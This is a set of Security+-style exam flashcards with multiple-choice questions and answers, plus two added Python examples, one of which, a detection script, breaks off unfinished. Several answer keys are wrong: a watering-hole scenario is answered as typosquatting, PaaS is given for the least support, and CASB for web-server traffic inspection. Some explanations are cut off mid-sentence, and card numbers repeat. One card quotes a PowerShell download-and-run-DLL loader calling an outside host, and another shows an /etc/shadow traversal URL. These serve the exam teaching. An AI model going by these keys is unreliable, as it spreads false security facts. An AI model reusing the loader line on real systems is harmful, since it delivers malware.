300-400 Flashcards

1
Q

A security analyst discovers that a company’s username and password database was posted on an Internet forum. The usernames and passwords are stored in plain text. Which of the following would mitigate the damage done by this type of data exfiltration in the future?

A. Create DLP controls that prevent documents from leaving the network.
B. Implement salting and hashing.
C. Configure the web content filter to block access to the forum.
D. Increase password complexity requirements.

A

B. Implement salting and hashing.

2
Q

Joe, an employee, receives an email stating he won the lottery. The email includes a link that requests a name, mobile phone number, address, and date of birth be provided to confirm Joe’s identity before sending him the prize. Which of the following BEST describes this type of email?

A. Spear phishing
B. Whaling
C. Phishing
D. Vishing

A

C. Phishing

3
Q

A company deployed a WiFi access point in a public area and wants to harden the configuration to make it more secure. After performing an assessment, an analyst identifies that the access point is configured to use WPA3, AES, WPS, and RADIUS. Which of the following should the analyst disable to enhance the access point security?

A. WPA3
B. AES
C. RADIUS
D. WPS

A

D. WPS

4
Q

Which of the following would be used to find the MOST common web-application vulnerabilities?

A. OWASP
B. MITRE ATT&CK
C. Cyber Kill Chain
D. SDLC

A

A. OWASP

5
Q

A network engineer is troubleshooting wireless network connectivity issues that were reported by users. The issues are occurring only in the section of the building that is closest to the parking lot. Users are intermittently experiencing slow speeds when accessing websites and are unable to connect to network drives. The issues appear to increase when laptop users return to their desks after using their devices in other areas of the building. There have also been reports of users being required to enter their credentials on web pages in order to gain access to them. Which of the following is the MOST likely cause of this issue?

A. An external access point is engaging in an evil-twin attack.
B. The signal on the WAP needs to be increased in that section of the building.
C. The certificates have expired on the devices and need to be reinstalled.
D. The users in that section of the building are on a VLAN that is being blocked by the firewall

A

A. An external access point is engaging in an evil-twin attack.

6
Q

A security administrator suspects there may be unnecessary services running on a server. Which of the following tools will the administrator MOST likely use to confirm the suspicions?

A. Nmap
B. Wireshark
C. Autopsy
D. DNSEnum

A

A. Nmap

Nmap (Network Mapper) is a powerful network scanning tool that can be used to discover open ports and services running on a server.

7
Q

A vulnerability has been discovered and a known patch to address the vulnerability does not exist. Which of the following controls works BEST until a proper fix is released?

A. Detective
B. Compensating
C. Deterrent
D. Corrective

A

B. Compensating

Compensating controls are alternative security measures that are implemented in the absence of a specific control or when the existing control is insufficient to mitigate a risk.

8
Q

While reviewing pcap data, a network security analyst is able to locate plaintext usernames and passwords being sent from workstations to network switches. Which of the following is the security analyst MOST likely observing?

A. SNMP traps
B. A Telnet session
C. An SSH connection
D. SFTP traffic

A

B. A Telnet session

9
Q

An attacker replaces a digitally signed document with another version that goes unnoticed. Upon reviewing the document’s contents, the author notices some additional verbiage that was not originally in the document but cannot validate an integrity issue. Which of the following attacks was used?

A. Cryptomalware
B. Hash substitution
C. Collision
D. Phishing

A

C. Collision

10
Q

A security analyst notices that specific files are being deleted each time a systems administrator is on vacation. Which of the following BEST describes the type of malware that is running?

A. Fileless virus
B. Logic bomb
C. Keylogger
D. Ransomware

A

B. Logic bomb

11
Q

Which of the following involves the inclusion of code in the main codebase as soon as it is written?

A. Continuous monitoring
B. Continuous deployment
C. Continuous validation
D. Continuous integration

A

D. Continuous integration

12
Q

Which of the following can reduce vulnerabilities by avoiding code reuse?

A. Memory management
B. Stored procedures
C. Normalization
D. Code obfuscation

A

D. Code obfuscation

Code obfuscation is a technique used to make code more difficult to understand or reverse engineer.

13
Q

The technology department at a large global company is expanding its Wi-Fi network infrastructure at the headquarters building. Which of the following should be closely coordinated between the technology, cybersecurity, and physical security departments?

A. Authentication protocol
B. Encryption type
C. WAP placement
D. VPN configuration

A

C. WAP placement

14
Q

Which of the following is an example of risk avoidance?

A. Installing security updates directly in production to expedite vulnerability fixes
B. Buying insurance to prepare for financial loss associated with exploits
C. Not installing new software to prevent compatibility errors
D. Not taking preventive measures to stop the theft of equipment

A

C. Not installing new software to prevent compatibility errors

15
Q

A security administrator needs to block a TCP connection using the corporate firewall. Because this connection is potentially a threat, the administrator does not want to send back an RST (Reset Packet). Which of the following actions in the firewall rule would work BEST?

A. Drop
B. Reject
C. Log alert
D. Permit

A

A. Drop

15
Q

A security team discovered a large number of company-issued devices with non-work-related software installed. Which of the following policies would MOST likely contain language that would prohibit this activity?

A. NDA
B. BPA
C. AUP
D. SLA

A

C. AUP - Acceptable Use Policy

16
Q

Which of the following BEST describes data streams that are compiled through artificial intelligence that provides insight on current cyberintrusions, phishing, and other malicious cyberactivity?

A. Intelligence fusion
B. Review reports
C. Log reviews
D. Threat feeds

A

D. Threat feeds

17
Q

Which of the following would be the BEST resource for a software developer who is looking to improve secure coding practices for web applications?

A. OWASP
B. Vulnerability scan results
C. NIST CSF
D. Third-party libraries

A

A. OWASP

18
Q

Ann, a customer, received a notification from her mortgage company stating her PII may be shared with partners, affiliates, and associates to maintain day-to-day business operations. Which of the following documents did Ann receive?

A. An annual privacy notice
B. A non-disclosure agreement
C. A privileged-user agreement
D. A memorandum of understanding

A

A. An annual privacy notice

19
Q

A Chief Information Security Officer (CISO) is evaluating the dangers involved in deploying a new ERP (Enterprise Resource Planning) system for the company. The CISO categorizes the system, selects the controls that apply to the system, implements the controls, and then assesses the success of the controls before authorizing the system. Which of the following is the CISO using to evaluate the environment for this new ERP system?

A. The Diamond Model of Intrusion Analysis
B. CIS Critical Security Controls
C. NIST Risk Management Framework
D. ISO 27002

A

C. NIST Risk Management Framework

The NIST Risk Management Framework (RMF) is the framework the CISO is using to evaluate the environment for this new ERP system. RMF is a structured approach to managing information security risk that organizations use to ensure the confidentiality, integrity, and availability of their information systems and data; its steps (categorize, select, implement, assess, authorize, monitor) match the sequence the CISO follows in the scenario.

20
Q

A manufacturing company has several one-off legacy information systems that cannot be migrated to a newer OS due to software compatibility issues. The OSs are still supported by the vendor, but the industrial software is no longer supported. The Chief Information Security Officer has created a resiliency plan for these systems that will allow OS patches to be installed in a non-production environment, while also creating backups of the systems for recovery. Which of the following resiliency techniques will provide these capabilities?

A. Redundancy
B. RAID 1+5
C. Virtual machines
D. Full backups

A

C. Virtual machines

21
Q

A retail store has a business requirement to deploy a kiosk computer in an open area. The kiosk computer’s operating system has been hardened and tested. A security engineer is concerned that someone could use removable media to install a rootkit. Which of the following should the security engineer configure to BEST protect the kiosk computer?

A. Measured boot
B. Boot attestation
C. UEFI
D. EDR

A

A. Measured boot

Measured Boot is a feature introduced in Windows 8 to help better protect a machine from rootkits and other malware. Measured Boot measures each startup component, from the firmware all the way to the boot drivers, and stores those measurements in the Trusted Platform Module (TPM), so that tampering with the boot chain can be detected.

22
Q

A company is implementing MFA for all applications that store sensitive data. The IT manager wants MFA to be non-disruptive and user friendly. Which of the following technologies should the IT manager use when implementing MFA?

A. One-time passwords
B. Email tokens
C. Push notifications
D. Hardware authentication

A

C. Push notifications

23
Q

A security engineer is reviewing the logs from a SAML application that is configured to use MFA. During this review, the engineer notices a high volume of successful logins that did not require MFA from users who were traveling internationally. The application, which can be accessed without a VPN, has a policy that allows time-based tokens to be generated. Users who change locations should be required to reauthenticate but have been able to log in without doing so. Which of the following statements BEST explains the issue?

A. OpenID is mandatory to make the MFA requirements work.
B. An incorrect browser has been detected by the SAML application.
C. The access device has a trusted certificate installed that is overwriting the session token.
D. The user’s IP address is changing between logins, but the application is not invalidating the token.

A

D. The user’s IP address is changing between logins, but the application is not invalidating the token.

24
Q

An organization wants to enable built-in FDE on all laptops. Which of the following should the organization ensure is installed on all laptops?

A. TPM
B. CA
C. SAML
D. CRL

A

A. TPM (Trusted Platform Module)

25
Q

A security analyst needs to centrally manage credentials and permissions to the company’s network devices. The following security requirements must be met:

  • All actions performed by the network staff must be logged.
  • Per-command permissions must be possible.
  • The authentication server and the devices must communicate through TCP.

Which of the following authentication protocols should the analyst choose?

A. Kerberos
B. CHAP
C. TACACS+
D. RADIUS

A

C. TACACS+

TACACS+ uses TCP traffic to provide authentication, authorization, and accounting services. It provides full-packet encryption as well as granular command controls, allowing individual commands to be secured as needed.

26
Q

An organization is concerned about intellectual property theft by employees who leave the organization. Which of the following should the organization MOST likely implement?

A. CBT
B. NDA
C. MOU
D. AUP

A

B. NDA

27
Q

A network manager is concerned that business may be negatively impacted if the firewall in its data center goes offline. The manager would like to implement a high availability pair to:

A. decrease the mean time between failures.
B. remove the single point of failure.
C. cut down the mean time to repair.
D. reduce the recovery time objective.

A

B. remove the single point of failure.

28
Q

A major manufacturing company updated its internal infrastructure and just recently started to allow OAuth applications to access corporate data. Data leakage is now being reported. Which of the following MOST likely caused the issue?

A. Privilege creep
B. Unmodified default settings
C. TLS protocol vulnerabilities
D. Improper patch management

A

A. Privilege creep

29
Q

While preparing a software inventory report, a security analyst discovers an unauthorized program installed on most of the company’s servers. The program utilizes the same code signing certificate as an application deployed to only the accounting team. After removing the unauthorized program, which of the following mitigations should the analyst implement to BEST secure the server environment?

A. Revoke the code signing certificate used by both programs.
B. Block all unapproved file hashes from installation
C. Add the accounting application file hash to the allowed list.
D. Update the code signing certificate for the approved application.

A

A. Revoke the code signing certificate used by both programs.

30
Q

A security analyst is reviewing the latest vulnerability scan report for a web server following an incident. The vulnerability report showed no concerning findings. The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is available for the vulnerability. Which of the following is the MOST likely cause?

A. Security patches failed to install due to a version incompatibility.
B. An adversary altered the vulnerability scan reports.
C. A zero-day vulnerability was used to exploit the web server.
D. The scan reported a false negative for the vulnerability.

A

D. The scan reported a false negative for the vulnerability.

31
Q

The help desk has received calls from users in multiple locations who are unable to access core network services. The network team has identified and turned off the network switches using remote commands. Which of the following actions should the network team take NEXT?

A. Disconnect all external network connections from the firewall.
B. Send response teams to the network switch locations to perform updates.
C. Turn on all the network switches by using the centralized management software.
D. Initiate the organization’s incident response plan.

A

D. Initiate the organization’s incident response plan.

32
Q

An attacker is trying to gain access by installing malware on a website that is known to be visited by the target victims. Which of the following is the attacker MOST likely attempting?

A. A spear-phishing attack
B. A watering-hole attack
C. Typo squatting
D. A phishing attack

A

C. Typo squatting

33
Q

An organization is moving away from the use of client-side and server-side certificates for EAP (Extensible Authentication Protocol). The company would like for the new EAP solution to have the ability to detect rogue access points. Which of the following would accomplish these requirements?

A. PEAP
B. EAP-FAST
C. EAP-TLS
D. EAP-TTLS

A

B. EAP-FAST authenticates by means of a PAC (Protected Access Credential) which can be managed dynamically by the authentication server.

The Extensible Authentication Protocol (EAP) is an authentication framework that allows for the use of different authentication methods for secure network access technologies.

34
Q

A security team is engaging a third-party vendor to do a penetration test of a new proprietary application prior to its release. Which of the following documents would the third-party vendor MOST likely be required to review and sign?

A. SLA
B. NDA
C. MOU
D. AUP

A

B. NDA

35
Q

Which of the following is an administrative control that would be MOST effective to reduce the occurrence of malware execution?

A. Security awareness training
B. Frequency of NIDS updates
C. Change control procedures
D. EDR reporting cycle

A

A. Security awareness training

36
Q

Employees at a company are receiving unsolicited text messages on their corporate cell phones. The unsolicited text messages contain a password reset link. Which of the following attacks is being used to target the company?

A. Phishing
B. Vishing
C. Smishing
D. Spam

A

C. Smishing

37
Q

During a Chief Information Security Officer (CISO) convention to discuss security awareness, the attendees are provided with a network connection to use as a resource. As the convention progresses, one of the attendees starts to notice delays in the connection, and the HTTPS site requests are reverting to HTTP. Which of the following BEST describes what is happening?

A. Birthday collision on the certificate key
B. DNS hijacking to reroute traffic
C. Brute force to the access point
D. A SSL/TLS downgrade

A

D. A SSL/TLS downgrade

38
Q

A user enters a password to log in to a workstation and is then prompted to enter an authentication code. Which of the following MFA factors or attributes are being utilized in the authentication process? (Choose two.)

A. Something you know
B. Something you have
C. Somewhere you are
D. Someone you know
E. Something you are
F. Something you can do

A

A. Something you know
B. Something you have

39
Q

A company uses specially configured workstations for any work that requires administrator privileges to its Tier 0 and Tier 1 systems. The company follows a strict process to harden systems immediately upon delivery. Even with these strict security measures in place, an incident occurred from one of the workstations. The root cause appears to be that the SoC was tampered with or replaced. Which of the following MOST likely occurred?

A. Fileless malware
B. A downgrade attack
C. A supply-chain attack
D. A logic bomb
E. Misconfigured BIOS

A

C. A supply-chain attack

40
Q

Audit logs indicate an administrative account that belongs to a security engineer has been locked out multiple times during the day. The security engineer has been on vacation for a few days. Which of the following attacks can the account lockout be attributed to?

A. Backdoor
B. Brute-force
C. Rootkit
D. Trojan

A

B. Brute-force

41
Q

After installing a patch on a security appliance, an organization realized a massive data exfiltration had occurred. Which of the following BEST describes the incident?

A. Supply chain attack
B. Ransomware attack
C. Cryptographic attack
D. Password attack

A

A. Supply chain attack

42
Q

An information security manager for an organization is completing a PCI DSS self-assessment for the first time. Which of the following is the MOST likely reason for this type of assessment?

A. An international expansion project is currently underway.
B. Outside consultants utilize this tool to measure security maturity.
C. The organization is expecting to process credit card information.
D. A government regulator has requested this audit to be completed.

A

C. The organization is expecting to process credit card information.

43
Q

Physical access to the organization’s servers in the data center requires entry and exit through multiple access points: a lobby, an access control vestibule, three doors leading to the server floor, a door to the server floor itself, and eventually to a caged area solely for the organization’s hardware. Which of the following controls is described in this scenario?

A. Compensating
B. Deterrent
C. Preventive
D. Detective

A

C. Preventive

Preventive controls are security measures designed to minimize or eliminate vulnerabilities and reduce the likelihood of a security incident occurring. They aim to prevent unauthorized access or actions from occurring in the first place.

44
Q

A new security engineer has started hardening systems. One of the hardening techniques the engineer is using involves disabling remote logins to the NAS. Users are now reporting the inability to use SCP to transfer files to the NAS, even though the data is still viewable from the users’ PCs. Which of the following is the MOST likely cause of this issue?

A. TFTP was disabled on the local hosts.
B. SSH was turned off instead of modifying the configuration file.
C. Remote login was disabled in the networkd.conf instead of using the sshd.conf.
D. Network services are no longer running on the NAS.

A

B. SSH was turned off instead of modifying the configuration file.

45
Q

An enterprise has hired an outside security firm to conduct penetration testing on its network and applications. The firm has been given the documentation only available to the customers of the applications. Which of the following BEST represents the type of testing that will occur?

A. Bug bounty
B. Black-box
C. Gray-box
D. White-box

A

C. Gray-box

46
Q

A network engineer and a security engineer are discussing ways to monitor network operations. Which of the following is the BEST method?

A. Disable Telnet and force SSH.
B. Establish a continuous ping.
C. Utilize an agentless monitor.
D. Enable SNMPv3 with passwords.

A

C. Utilize an agentless monitor.

47
Q

A company is switching to a remote work model for all employees. All company and employee resources will be in the cloud. Employees must use their personal computers to access the cloud computing environment. The company will manage the operating system. Which of the following deployment models is the company implementing?

A. CYOD
B. MDM
C. COPE
D. VDI

A

D. VDI

47
Q

A security analyst is looking for a solution to help communicate to the leadership team the severity levels of the organization’s vulnerabilities. Which of the following would BEST meet this need?

A. CVE
B. SIEM
C. SOAR
D. CVSS

A

D. CVSS

48
Q

A security administrator needs to inspect in-transit files on the enterprise network to search for PII, credit card data, and classification words. Which of the following would be the BEST to use?

A. IDS solution
B. EDR solution
C. HIPS software solution
D. Network DLP solution

A

D. Network DLP solution

49
Q

The Chief Executive Officer announced a new partnership with a strategic vendor and asked the Chief Information Security Officer to federate user digital identities using SAML-based protocols. Which of the following will this enable?

A. SSO
B. MFA
C. PKI
D. DLP

A

A. SSO

50
Q

An employee’s company account was used in a data breach. Interviews with the employee revealed:

  • The employee was able to avoid changing passwords by using a previous password again.
  • The account was accessed from a hostile, foreign nation, but the employee has never traveled to any other countries.

Which of the following can be implemented to prevent these issues from reoccurring? (Choose two.)

A. Geographic dispersal
B. Password complexity
C. Password history
D. Geotagging
E. Password lockout
F. Geofencing

A

C. Password history
F. Geofencing

51
Q

A large industrial system’s smart generator monitors the system status and sends alerts to third-party maintenance personnel when critical failures occur. While reviewing the network logs, the company’s security manager notices the generator’s IP is sending packets to an internal file server’s IP. Which of the following mitigations would be BEST for the security manager to implement while maintaining alerting capabilities?

A. Segmentation
B. Firewall allow list
C. Containment
D. Isolation

A

A. Segmentation

52
Q

Which of the following technologies is used to actively monitor for specific file types being transmitted on the network?

A. File integrity monitoring
B. Honeynets
C. Tcpreplay
D. Data loss prevention

A

D. Data loss prevention

53
Q

As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only contain wildcards at the secondary subdomain level. Which of the following certificate properties will meet these requirements?

A. HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

B. HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

C. HTTPS://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

D. HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2023

A

C. HTTPS://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

54
Q

A global pandemic is forcing a private organization to close some business units and reduce staffing at others. Which of the following would be BEST to help the organization’s executives determine their next course of action?

A. An incident response plan
B. A communication plan
C. A disaster recovery plan
D. A business continuity plan

A

D. A business continuity plan

55
Q

A cybersecurity analyst reviews the log files from a web server and sees a series of files that indicate a directory traversal attack has occurred. Which of the following is the analyst MOST likely seeing?

A. http://sample.url.com/
B. http://sample.url.com/someotherpageonsite/../../../etc/shadow
C. http://sample.url.com/select-from-database-where-password-null
D. http://redirect.sameple.url.sampleurl.com/malicious-dns-redirect

A

B. http://sample.url.com/someotherpageonsite/../../../etc/shadow

56
Q

A candidate attempts to go to http://comptia.org but accidentally visits http://comptiia.org. The malicious website looks exactly like the legitimate website. Which of the following BEST describes this type of attack?

A. Reconnaissance
B. Impersonation
C. Typosquatting
D. Watering-hole

A

C. Typosquatting

57
Q

A retail executive recently accepted a job with a major competitor. The following week, a security analyst reviews the security logs and identifies successful logon attempts to access the departed executive’s accounts. Which of the following security practices would have addressed the issue?

A. A non-disclosure agreement
B. Least privilege
C. An acceptable use policy
D. Offboarding

A

D. Offboarding

58
Q

The marketing department at a retail company wants to publish an internal website to the internet so it is reachable by a limited number of specific, external service providers in a secure manner. Which of the following configurations would be BEST to fulfil this requirement?

A. NAC
B. ACL
C. WAF
D. NAT

A

B. ACL

59
Q

A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported specialized Windows OS. Which of the following is MOST likely preventing the IT manager at the hospital from upgrading the specialized OS?

A. The time needed for the MRI vendor to upgrade the system would negatively impact patients.
B. The MRI vendor does not support newer versions of the OS.
C. Changing the OS breaches a support SLA with the MRI vendor.
D. The IT team does not have the budget required to upgrade the MRI scanner.

A

B. The MRI vendor does not support newer versions of the OS.

60
Q

A company received a “right to be forgotten” request. To legally comply, the company must remove data related to the requester from its systems. Which of the following is the company MOST likely complying with?

A. NIST CSF
B. GDPR
C. PCI DSS
D. ISO 27001

A

B. GDPR

61
Q

An engineer wants to inspect traffic to a cluster of web servers in a cloud environment. Which of the following solutions should the engineer implement?

A. CASB
B. WAF
C. Load balancer
D. VPN

A

A. CASB

Cloud Access Security Broker

61
Q

A security team suspects that the cause of recent power consumption overloads is the unauthorized use of empty power outlets in the network rack. Which of the following options will mitigate this issue without compromising the number of outlets available?

A. Adding a new UPS dedicated to the rack
B. Installing a managed PDU
C. Using only a dual power supplies unit
D. Increasing power generator capacity

A

B. Installing a managed PDU

A managed PDU is a device that provides electrical power distribution to equipment in a rack. It allows for individual monitoring and control of power outlets. By installing a managed PDU,

62
Q

A security analyst needs to implement an MDM solution for BYOD users that will allow the company to retain control over company emails residing on the devices and limit data exfiltration that might occur if the devices are lost or stolen. Which of the following would BEST meet these requirements? (Choose two.)

A. Full device encryption
B. Network usage rules
C. Geofencing
D. Containerization
E. Application approval list
F. Remote control

A

D. Containerization
F. Remote control

63
Q

A security administrator is evaluating remote access solutions for employees who are geographically dispersed. Which of the following would provide the MOST secure remote access? (Choose two.)

A. IPSec
B. SFTP
C. SRTP
D. LDAPS
E. S/MIME
F. SSL VPN

A

A. IPSec
F. SSL VPN

64
Q

A malicious actor recently penetrated a company’s network and moved laterally to the data center. Upon investigation, a forensics firm wants to know what was in the memory on the compromised server. Which of the following files should be given to the forensics firm?

A. Security
B. Application
C. Dump
D. Syslog

A

C. Dump

65
Q

A company is looking to migrate some servers to the cloud to minimize its technology footprint. The company has a customer relationship management system on premises. Which of the following solutions will require the LEAST infrastructure and application support from the company?

A. SaaS
B. IaaS
C. PaaS
D. SDN

A

C. PaaS

PaaS provides a cloud-based platform for developing, running, and managing applications. The cloud services provider hosts, manages, and maintains all the hardware and software included in the platform - servers (for development, testing, and deployment), operating system (OS) software, storage, networking, databases, middleware, runtimes, frameworks, development tools - as well as

66
Q

A network administrator needs to determine the sequence of a server farm’s logs. Which of the following should the administrator consider? (Choose two.)

A. Chain of custody
B. Tags
C. Reports
D. Time stamps
E. Hash values
F. Time offset

A

D. Time stamps
F. Time offset

67
Q

Which of the following is the BEST reason to maintain a functional and effective asset management policy that aids in ensuring the security of an organization?

A. To provide data to quantify risk based on the organization’s systems
B. To keep all software and hardware fully patched for known vulnerabilities
C. To only allow approved, organization-owned devices onto the business network
D. To standardize by selecting one laptop model for all users in the organization

A

A. To provide data to quantify risk based on the organization’s systems

68
Q

A security administrator, who is working for a government organization, would like to utilize classification and granular planning to secure top secret data and grant access on a need-to-know basis. Which of the following access control schemas should the administrator consider?

A. Mandatory
B. Rule-based
C. Discretionary
D. Role-based

A

A. Mandatory

69
Q

An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of data and how to process it?

A. Data custodian
B. Data controller
C. Data protection officer
D. Data processor

A

B. Data controller

70
Q

Multiple beaconing activities to a malicious domain have been observed. The malicious domain is hosting malware from various endpoints on the network. Which of the following technologies would be BEST to correlate the activities between the different endpoints?

A. Firewall
B. SIEM
C. IPS
D. Protocol analyzer

A

B. SIEM

71
Q

Which of the following types of controls is a turnstile?

A. Physical
B. Detective
C. Corrective
D. Technical

A

A. Physical

72
Q

Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is successful between the two devices. Which of the following tools should the security analyst use to help identify if the traffic is being blocked?

A. nmap
B. tracert
C. ping
D. ssh

A

A. nmap

Because ICMP already succeeds, ping and tracert only confirm the route; the open question is whether the application's TCP port is reachable. Scanning that port on the server with nmap reports it as open, closed (the host answers with a RST) or filtered (no answer at all), and a filtered result is the signature of a firewall silently dropping the traffic.

73
Q

As part of annual audit requirements, the security team performed a review of exceptions to the company policy that allows specific users the ability to use USB storage devices on their laptops. The review yielded the following results:

  • The exception process and policy have been correctly followed by the majority of users.
  • A small number of users did not create tickets for the requests but were granted access.
  • All access had been approved by supervisors.
  • Valid requests for the access sporadically occurred across multiple departments.
  • Access, in most cases, had not been removed when it was no longer needed.

Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded access is removed in a reasonable time frame?

A. Create an automated, monthly attestation process that removes access if an employee’s supervisor denies the approval.
B. Remove access for all employees and only allow new access to be granted if the employee’s supervisor approves the request.
C. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team.
D. Implement a ticketing system that tracks each request and generates reports listing which employees actively use USB storage devices.

A

C. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team.

74
Q

A financial institution would like to store its customer data in a cloud but still allow the data to be accessed and manipulated while encrypted. Doing so would prevent the cloud service provider from being able to decipher the data due to its sensitivity. The financial institution is not concerned about computational overheads and slow speeds. Which of the following cryptographic techniques would BEST meet the requirement?

A. Asymmetric
B. Symmetric
C. Homomorphic
D. Ephemeral

A

C. Homomorphic

Homomorphic encryption is a form of encryption that allows computations to be performed on encrypted data without decrypting it. This means that the cloud service provider cannot decipher the data even when performing operations on it.
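The following Python is an added example, not part of the original card: it implements Paillier, an additively homomorphic scheme, so that the mechanics behind "manipulated while encrypted" can be run by hand. A party holding only the public key (the cloud provider in the question) can add encrypted values together or multiply them by a known constant, and only the holder of the private key can read the result. Paillier is partially homomorphic (addition only); the fully homomorphic schemes the question alludes to support arbitrary computation at far higher cost, but the contract is the same. The primes P and Q are toy values chosen for readability.

```python
import math
import secrets

# Toy primes chosen for this example so the arithmetic stays readable;
# real deployments use primes of 1024 bits or more.
P = 1000003
Q = 1000033


def keygen(p=P, q=Q):
    """Return ((n, g), (lam, mu)): Paillier public and private keys."""
    n = p * q
    lam = math.lcm(p - 1, q - 1)     # Carmichael's lambda(n)
    g = n + 1                         # standard choice of generator
    n2 = n * n
    # mu = L(g^lam mod n^2)^-1 mod n, with L(u) = (u - 1) // n
    mu = pow((pow(g, lam, n2) - 1) // n, -1, n)
    return (n, g), (lam, mu)


def encrypt(pub, m):
    """Encrypt 0 <= m < n under the public key with fresh randomness r."""
    n, g = pub
    n2 = n * n
    while True:
        r = secrets.randbelow(n - 1) + 1          # r in [1, n-1]
        if math.gcd(r, n) == 1:
            break
    return (pow(g, m, n2) * pow(r, n, n2)) % n2


def decrypt(pub, priv, c):
    """Recover m from c using the private key (lam, mu)."""
    n, _ = pub
    lam, mu = priv
    n2 = n * n
    return ((pow(c, lam, n2) - 1) // n * mu) % n


def add_encrypted(pub, c1, c2):
    """Ciphertext of m1 + m2, computed from c1 and c2 alone."""
    n, _ = pub
    return (c1 * c2) % (n * n)


def scale_encrypted(pub, c, k):
    """Ciphertext of k * m, computed from c and the public scalar k."""
    n, _ = pub
    return pow(c, k, n * n)


def untrusted_sum(pub, ciphertexts):
    """What a provider holding only the public key can do: total the encrypted balances."""
    total = encrypt(pub, 0)
    for c in ciphertexts:
        total = add_encrypted(pub, total, c)
    return total
```

Each call to encrypt draws fresh randomness, so the provider cannot even tell whether two customers hold the same balance, yet it can still produce the encrypted total on request.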

75
Q

A cryptomining company recently deployed a new antivirus application to all of its mining systems. The installation of the antivirus application was tested on many personal devices, and no issues were observed. Once the antivirus application was rolled out to the servers, constant issues were reported. As a result, the company decided to remove the mining software. The antivirus application was MOST likely classifying the software as:

A. a rootkit.
B. a PUP.
C. a backdoor.
D. ransomware.
E. a RAT.

A

B. a PUP.

76
Q

A cybersecurity administrator is using iptables as an enterprise firewall. The administrator created some rules, but the network now seems to be unresponsive. All connections are being dropped by the firewall. Which of the following would be the BEST option to remove the rules?

A. # iptables -t mangle -X
B. # iptables -F
C. # iptables -Z
D. # iptables -P INPUT -j DROP

A

B. # iptables -F

iptables -F flushes every rule in every chain of the filter table but leaves the chain default policies untouched. If the lockout was caused by a default policy of DROP (which is exactly what option D would set) rather than by the rules themselves, the policies must also be reset, for example with iptables -P INPUT ACCEPT, before connectivity returns. Option A deletes only empty user-defined chains in the mangle table, and option C merely zeroes the packet and byte counters.

77
Q

An incident response technician collected a mobile device during an investigation. Which of the following should the technician do to maintain chain of custody?

A. Document the collection and require a sign-off when possession changes.
B. Lock the device in a safe or other secure location to prevent theft or alteration.
C. Place the device in a Faraday cage to prevent corruption of the data.
D. Record the collection in a blockchain-protected public ledger.

A

A. Document the collection and require a sign-off when possession changes.

78
Q

A company recently implemented a patch management policy; however, vulnerability scanners have still been flagging several hosts, even after the completion of the patch process. Which of the following is the MOST likely cause of the issue?

A. The vendor firmware lacks support.
B. Zero-day vulnerabilities are being discovered.
C. Third-party applications are not being patched.
D. Code development is being outsourced.

A

C. Third-party applications are not being patched.

79
Q

Which of the following controls would provide the BEST protection against tailgating?

A. Access control vestibule
B. Closed-circuit television
C. Proximity card reader
D. Faraday cage

A

A. Access control vestibule

79
Q

An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

A. A PowerShell code is performing a DLL injection.
B. A PowerShell code is displaying a picture.
C. A PowerShell code is configuring environmental variables.
D. A PowerShell code is changing Windows Update settings.

A

A. A PowerShell code is performing a DLL injection.

The script fetches a file disguised as an image (04EB18.jpg), writes it to the user's temp directory under the name autoupdate.dll, and then launches it through rundll32.exe. Strictly speaking this is a download-and-execute loader rather than injection into another process, but of the options given it is the only one that describes loading attacker-supplied DLL code; the script only reads $env:TEMP and never sets environment variables or touches Windows Update.
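As an added example (not part of the original card), the Python below shows the detection logic an analyst would run over process-creation telemetry to catch this pattern: a URL whose extension does not match the file it is saved as, a payload written to a temp directory with an executable extension, and a living-off-the-land binary such as rundll32.exe pointed at that same file. The sample events are constructed for the example, with event 0 mirroring the question's script; the per-reason scoring and the alert threshold of 4 are assumptions, not a published rule.

```python
import re
from dataclasses import dataclass, field

# Constructed process-creation events (Sysmon Event ID 1 style), not real telemetry:
# (parent image, image, command line). Event 0 mirrors the script from the question.
SAMPLE_EVENTS = [
    ("outlook.exe", "powershell.exe",
     r"powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;"
     r"Start-Process rundll32.exe $env:TEMP\autoupdate.dll"),
    ("explorer.exe", "powershell.exe",
     r"powershell.exe -Command Get-Process | Out-File C:\Users\joe\procs.txt"),
    ("svchost.exe", "powershell.exe",
     r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
    ("cmd.exe", "powershell.exe",
     r"powershell.exe Invoke-WebRequest -Uri https://updates.example.com/agent.msi -OutFile C:\Temp\agent.msi"),
]

URL_RE = re.compile(r"https?://(?P<url>[^\s;]+)", re.I)
OUTFILE_RE = re.compile(r"-OutFile\s+(?P<path>[^\s;]+)", re.I)
LOADER_RE = re.compile(r"\b(rundll32|regsvr32|mshta|wscript|cscript)\.exe\b", re.I)
TEMP_RE = re.compile(r"\$env:TEMP|%TEMP%|\\Temp\\|\\AppData\\Local\\Temp", re.I)
EXEC_EXTS = {"dll", "exe", "scr", "hta", "js", "vbs", "ps1", "bat"}


@dataclass
class Finding:
    reasons: list = field(default_factory=list)

    @property
    def score(self):
        return len(self.reasons)


def ext(path):
    """Extension of the last path segment, handling both / and \\ separators."""
    tail = re.split(r"[\\/]", path)[-1]
    return tail.rsplit(".", 1)[-1].lower() if "." in tail else ""


def analyze(command_line):
    """Collect the suspicious traits of one command line."""
    f = Finding()
    url = URL_RE.search(command_line)
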